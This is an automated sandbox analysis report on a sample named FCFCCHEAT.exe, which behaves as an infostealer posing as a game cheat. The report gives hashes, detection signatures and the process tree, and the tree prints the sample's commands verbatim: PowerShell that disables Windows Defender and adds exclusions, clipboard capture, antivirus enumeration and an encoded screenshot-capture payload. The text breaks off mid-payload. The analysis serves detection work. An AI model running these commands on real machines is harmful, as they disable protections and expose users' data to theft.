Analysis
-
max time kernel
125s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-10-2024 18:25
Behavioral task
behavioral1
Sample
FCFCCHEAT.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
FCFCCHEAT.exe
Resource
win10v2004-20241007-en
General
-
Target
FCFCCHEAT.exe
-
Size
7.4MB
-
MD5
1f0d3df315270ca370c5a33958b31b2b
-
SHA1
55f86eb687bc8b398ab9342fe3d9fe636dfd633b
-
SHA256
5ac09a5c05205dc089af711c8de939512a20e0683f611730d3d410b235293f3f
-
SHA512
47e2b0b07855d8f26e9db3a9c61fb6bc06fa8603d6fd72d1cabb1c512e0b538c7fe1014a780ffe2c28c4c95aa0746d6e1dbdd0fc661b80245d89c5c3cbf866f7
-
SSDEEP
98304:7NSi8TR+PurErvz81LpWjjUa50ZtPvYRt2e4GFNGjfzfbIbApJo4EwKhOh112mJ3:78WurErvI9pWjgfPvzm6gsFEF4fv
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2140 powershell.exe 536 powershell.exe 4032 powershell.exe 748 powershell.exe 3856 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts FCFCCHEAT.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4716 cmd.exe 3792 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4556 rar.exe -
Loads dropped DLL 16 IoCs
pid Process 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe 4560 FCFCCHEAT.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 27 discord.com 28 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 3016 tasklist.exe 244 tasklist.exe 2952 tasklist.exe 1532 tasklist.exe -
resource yara_rule behavioral2/files/0x0007000000023c8a-21.dat upx behavioral2/memory/4560-25-0x00007FFF169F0000-0x00007FFF16FE2000-memory.dmp upx behavioral2/files/0x0007000000023c7d-27.dat upx behavioral2/memory/4560-30-0x00007FFF29BB0000-0x00007FFF29BD4000-memory.dmp upx behavioral2/files/0x0007000000023c88-29.dat upx behavioral2/files/0x0007000000023c84-47.dat upx behavioral2/files/0x0007000000023c83-46.dat upx behavioral2/files/0x0007000000023c82-45.dat upx behavioral2/memory/4560-48-0x00007FFF2EBF0000-0x00007FFF2EBFF000-memory.dmp upx behavioral2/files/0x0007000000023c81-44.dat upx behavioral2/files/0x0007000000023c80-43.dat upx behavioral2/files/0x0007000000023c7f-42.dat upx behavioral2/files/0x0007000000023c7e-41.dat upx behavioral2/files/0x0007000000023c7c-40.dat upx behavioral2/files/0x0007000000023c8f-39.dat upx behavioral2/files/0x0007000000023c8e-38.dat upx behavioral2/files/0x0007000000023c8d-37.dat upx behavioral2/files/0x0007000000023c89-34.dat upx behavioral2/files/0x0007000000023c87-33.dat upx behavioral2/memory/4560-54-0x00007FFF26940000-0x00007FFF2696D000-memory.dmp upx behavioral2/memory/4560-56-0x00007FFF2DBF0000-0x00007FFF2DC09000-memory.dmp upx behavioral2/memory/4560-58-0x00007FFF26910000-0x00007FFF26933000-memory.dmp upx behavioral2/memory/4560-60-0x00007FFF265B0000-0x00007FFF2672E000-memory.dmp upx behavioral2/memory/4560-64-0x00007FFF2C1F0000-0x00007FFF2C1FD000-memory.dmp upx behavioral2/memory/4560-63-0x00007FFF2C2C0000-0x00007FFF2C2D9000-memory.dmp upx behavioral2/memory/4560-66-0x00007FFF267C0000-0x00007FFF267F3000-memory.dmp upx behavioral2/memory/4560-69-0x00007FFF169F0000-0x00007FFF16FE2000-memory.dmp upx behavioral2/memory/4560-70-0x00007FFF160C0000-0x00007FFF165E9000-memory.dmp upx behavioral2/memory/4560-72-0x00007FFF29BB0000-0x00007FFF29BD4000-memory.dmp upx behavioral2/memory/4560-74-0x00007FFF2A320000-0x00007FFF2A334000-memory.dmp upx behavioral2/memory/4560-76-0x00007FFF2C1E0000-0x00007FFF2C1ED000-memory.dmp upx behavioral2/memory/4560-71-0x00007FFF262B0000-0x00007FFF2637D000-memory.dmp upx behavioral2/memory/4560-81-0x00007FFF20BA0000-0x00007FFF20CBC000-memory.dmp upx behavioral2/memory/4560-117-0x00007FFF26910000-0x00007FFF26933000-memory.dmp upx behavioral2/memory/4560-118-0x00007FFF265B0000-0x00007FFF2672E000-memory.dmp upx behavioral2/memory/4560-271-0x00007FFF2C2C0000-0x00007FFF2C2D9000-memory.dmp upx behavioral2/memory/4560-297-0x00007FFF267C0000-0x00007FFF267F3000-memory.dmp upx behavioral2/memory/4560-312-0x00007FFF160C0000-0x00007FFF165E9000-memory.dmp upx behavioral2/memory/4560-314-0x00007FFF262B0000-0x00007FFF2637D000-memory.dmp upx behavioral2/memory/4560-341-0x00007FFF265B0000-0x00007FFF2672E000-memory.dmp upx behavioral2/memory/4560-335-0x00007FFF169F0000-0x00007FFF16FE2000-memory.dmp upx behavioral2/memory/4560-336-0x00007FFF29BB0000-0x00007FFF29BD4000-memory.dmp upx behavioral2/memory/4560-449-0x00007FFF267C0000-0x00007FFF267F3000-memory.dmp upx behavioral2/memory/4560-450-0x00007FFF160C0000-0x00007FFF165E9000-memory.dmp upx behavioral2/memory/4560-448-0x00007FFF265B0000-0x00007FFF2672E000-memory.dmp upx behavioral2/memory/4560-447-0x00007FFF2C2C0000-0x00007FFF2C2D9000-memory.dmp upx behavioral2/memory/4560-446-0x00007FFF2C1F0000-0x00007FFF2C1FD000-memory.dmp upx behavioral2/memory/4560-445-0x00007FFF26910000-0x00007FFF26933000-memory.dmp upx behavioral2/memory/4560-444-0x00007FFF2DBF0000-0x00007FFF2DC09000-memory.dmp upx behavioral2/memory/4560-443-0x00007FFF26940000-0x00007FFF2696D000-memory.dmp upx behavioral2/memory/4560-442-0x00007FFF2EBF0000-0x00007FFF2EBFF000-memory.dmp upx behavioral2/memory/4560-441-0x00007FFF29BB0000-0x00007FFF29BD4000-memory.dmp upx behavioral2/memory/4560-440-0x00007FFF262B0000-0x00007FFF2637D000-memory.dmp upx behavioral2/memory/4560-451-0x00007FFF169F0000-0x00007FFF16FE2000-memory.dmp upx behavioral2/memory/4560-452-0x00007FFF2A320000-0x00007FFF2A334000-memory.dmp upx behavioral2/memory/4560-453-0x00007FFF2C1E0000-0x00007FFF2C1ED000-memory.dmp upx behavioral2/memory/4560-454-0x00007FFF20BA0000-0x00007FFF20CBC000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 448 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3752 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 536 powershell.exe 2140 powershell.exe 4032 powershell.exe 536 powershell.exe 2140 powershell.exe 4032 powershell.exe 3792 powershell.exe 3792 powershell.exe 3792 powershell.exe 2776 powershell.exe 2776 powershell.exe 2776 powershell.exe 748 powershell.exe 748 powershell.exe 1960 powershell.exe 1960 powershell.exe 3856 powershell.exe 3856 powershell.exe 636 powershell.exe 636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 536 powershell.exe Token: SeDebugPrivilege 2140 powershell.exe Token: SeDebugPrivilege 4032 powershell.exe Token: SeDebugPrivilege 1532 tasklist.exe Token: SeDebugPrivilege 3016 tasklist.exe Token: SeIncreaseQuotaPrivilege 2016 WMIC.exe Token: SeSecurityPrivilege 2016 WMIC.exe Token: SeTakeOwnershipPrivilege 2016 WMIC.exe Token: SeLoadDriverPrivilege 2016 WMIC.exe Token: SeSystemProfilePrivilege 2016 WMIC.exe Token: SeSystemtimePrivilege 2016 WMIC.exe Token: SeProfSingleProcessPrivilege 2016 WMIC.exe Token: SeIncBasePriorityPrivilege 2016 WMIC.exe Token: SeCreatePagefilePrivilege 2016 WMIC.exe Token: SeBackupPrivilege 2016 WMIC.exe Token: SeRestorePrivilege 2016 WMIC.exe Token: SeShutdownPrivilege 2016 WMIC.exe Token: SeDebugPrivilege 2016 WMIC.exe Token: SeSystemEnvironmentPrivilege 2016 WMIC.exe Token: SeRemoteShutdownPrivilege 2016 WMIC.exe Token: SeUndockPrivilege 2016 WMIC.exe Token: SeManageVolumePrivilege 2016 WMIC.exe Token: 33 2016 WMIC.exe Token: 34 2016 WMIC.exe Token: 35 2016 WMIC.exe Token: 36 2016 WMIC.exe Token: SeDebugPrivilege 3792 powershell.exe Token: SeIncreaseQuotaPrivilege 2016 WMIC.exe Token: SeSecurityPrivilege 2016 WMIC.exe Token: SeTakeOwnershipPrivilege 2016 WMIC.exe Token: SeLoadDriverPrivilege 2016 WMIC.exe Token: SeSystemProfilePrivilege 2016 WMIC.exe Token: SeSystemtimePrivilege 2016 WMIC.exe Token: SeProfSingleProcessPrivilege 2016 WMIC.exe Token: SeIncBasePriorityPrivilege 2016 WMIC.exe Token: SeCreatePagefilePrivilege 2016 WMIC.exe Token: SeBackupPrivilege 2016 WMIC.exe Token: SeRestorePrivilege 2016 WMIC.exe Token: SeShutdownPrivilege 2016 WMIC.exe Token: SeDebugPrivilege 2016 WMIC.exe Token: SeSystemEnvironmentPrivilege 2016 WMIC.exe Token: SeRemoteShutdownPrivilege 2016 WMIC.exe Token: SeUndockPrivilege 2016 WMIC.exe Token: SeManageVolumePrivilege 2016 WMIC.exe Token: 33 2016 WMIC.exe Token: 34 2016 WMIC.exe Token: 35 2016 WMIC.exe Token: 36 2016 WMIC.exe Token: SeDebugPrivilege 244 tasklist.exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 2952 tasklist.exe Token: SeDebugPrivilege 748 powershell.exe Token: SeDebugPrivilege 1960 powershell.exe Token: SeIncreaseQuotaPrivilege 3948 WMIC.exe Token: SeSecurityPrivilege 3948 WMIC.exe Token: SeTakeOwnershipPrivilege 3948 WMIC.exe Token: SeLoadDriverPrivilege 3948 WMIC.exe Token: SeSystemProfilePrivilege 3948 WMIC.exe Token: SeSystemtimePrivilege 3948 WMIC.exe Token: SeProfSingleProcessPrivilege 3948 WMIC.exe Token: SeIncBasePriorityPrivilege 3948 WMIC.exe Token: SeCreatePagefilePrivilege 3948 WMIC.exe Token: SeBackupPrivilege 3948 WMIC.exe Token: SeRestorePrivilege 3948 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3592 wrote to memory of 4560 3592 FCFCCHEAT.exe 84 PID 3592 wrote to memory of 4560 3592 FCFCCHEAT.exe 84 PID 4560 wrote to memory of 1444 4560 FCFCCHEAT.exe 88 PID 4560 wrote to memory of 1444 4560 FCFCCHEAT.exe 88 PID 4560 wrote to memory of 4796 4560 FCFCCHEAT.exe 89 PID 4560 wrote to memory of 4796 4560 FCFCCHEAT.exe 89 PID 4560 wrote to memory of 444 4560 FCFCCHEAT.exe 90 PID 4560 wrote to memory of 444 4560 FCFCCHEAT.exe 90 PID 4796 wrote to memory of 4032 4796 cmd.exe 94 PID 4796 wrote to memory of 4032 4796 cmd.exe 94 PID 1444 wrote to memory of 2140 1444 cmd.exe 95 PID 1444 wrote to memory of 2140 1444 cmd.exe 95 PID 444 wrote to memory of 536 444 cmd.exe 96 PID 444 wrote to memory of 536 444 cmd.exe 96 PID 4560 wrote to memory of 4852 4560 FCFCCHEAT.exe 97 PID 4560 wrote to memory of 4852 4560 FCFCCHEAT.exe 97 PID 4560 wrote to memory of 1564 4560 FCFCCHEAT.exe 98 PID 4560 wrote to memory of 1564 4560 FCFCCHEAT.exe 98 PID 4560 wrote to memory of 4932 4560 FCFCCHEAT.exe 101 PID 4560 wrote to memory of 4932 4560 FCFCCHEAT.exe 101 PID 4560 wrote to memory of 4716 4560 FCFCCHEAT.exe 102 PID 4560 wrote to memory of 4716 4560 FCFCCHEAT.exe 102 PID 4852 wrote to memory of 3016 4852 cmd.exe 105 PID 4852 wrote to memory of 3016 4852 cmd.exe 105 PID 1564 wrote to memory of 1532 1564 cmd.exe 106 PID 1564 wrote to memory of 1532 1564 cmd.exe 106 PID 4560 wrote to memory of 428 4560 FCFCCHEAT.exe 107 PID 4560 wrote to memory of 428 4560 FCFCCHEAT.exe 107 PID 4560 wrote to memory of 4556 4560 FCFCCHEAT.exe 108 PID 4560 wrote to memory of 4556 4560 FCFCCHEAT.exe 108 PID 4932 wrote to memory of 2016 4932 cmd.exe 111 PID 4932 wrote to memory of 2016 4932 cmd.exe 111 PID 4560 wrote to memory of 2040 4560 FCFCCHEAT.exe 112 PID 4560 wrote to memory of 2040 4560 FCFCCHEAT.exe 112 PID 4716 wrote to memory of 3792 4716 cmd.exe 114 PID 4716 wrote to memory of 3792 4716 cmd.exe 114 PID 4560 wrote to memory of 2148 4560 FCFCCHEAT.exe 117 PID 4560 wrote to memory of 2148 4560 FCFCCHEAT.exe 117 PID 2040 wrote to memory of 3752 2040 cmd.exe 116 PID 2040 wrote to memory of 3752 2040 cmd.exe 116 PID 4560 wrote to memory of 1432 4560 FCFCCHEAT.exe 118 PID 4560 wrote to memory of 1432 4560 FCFCCHEAT.exe 118 PID 4556 wrote to memory of 904 4556 cmd.exe 120 PID 4556 wrote to memory of 904 4556 cmd.exe 120 PID 428 wrote to memory of 244 428 cmd.exe 122 PID 428 wrote to memory of 244 428 cmd.exe 122 PID 4560 wrote to memory of 4528 4560 FCFCCHEAT.exe 123 PID 4560 wrote to memory of 4528 4560 FCFCCHEAT.exe 123 PID 2148 wrote to memory of 2136 2148 cmd.exe 125 PID 2148 wrote to memory of 2136 2148 cmd.exe 125 PID 1432 wrote to memory of 2776 1432 cmd.exe 126 PID 1432 wrote to memory of 2776 1432 cmd.exe 126 PID 4528 wrote to memory of 1444 4528 cmd.exe 127 PID 4528 wrote to memory of 1444 4528 cmd.exe 127 PID 4560 wrote to memory of 5056 4560 FCFCCHEAT.exe 128 PID 4560 wrote to memory of 5056 4560 FCFCCHEAT.exe 128 PID 4560 wrote to memory of 4032 4560 FCFCCHEAT.exe 130 PID 4560 wrote to memory of 4032 4560 FCFCCHEAT.exe 130 PID 5056 wrote to memory of 2328 5056 cmd.exe 152 PID 5056 wrote to memory of 2328 5056 cmd.exe 152 PID 4560 wrote to memory of 4332 4560 FCFCCHEAT.exe 133 PID 4560 wrote to memory of 4332 4560 FCFCCHEAT.exe 133 PID 4032 wrote to memory of 3672 4032 cmd.exe 135 PID 4032 wrote to memory of 3672 4032 cmd.exe 135 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2328 attrib.exe 3092 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FCFCCHEAT.exe"C:\Users\Admin\AppData\Local\Temp\FCFCCHEAT.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Users\Admin\AppData\Local\Temp\FCFCCHEAT.exe"C:\Users\Admin\AppData\Local\Temp\FCFCCHEAT.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FCFCCHEAT.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FCFCCHEAT.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAg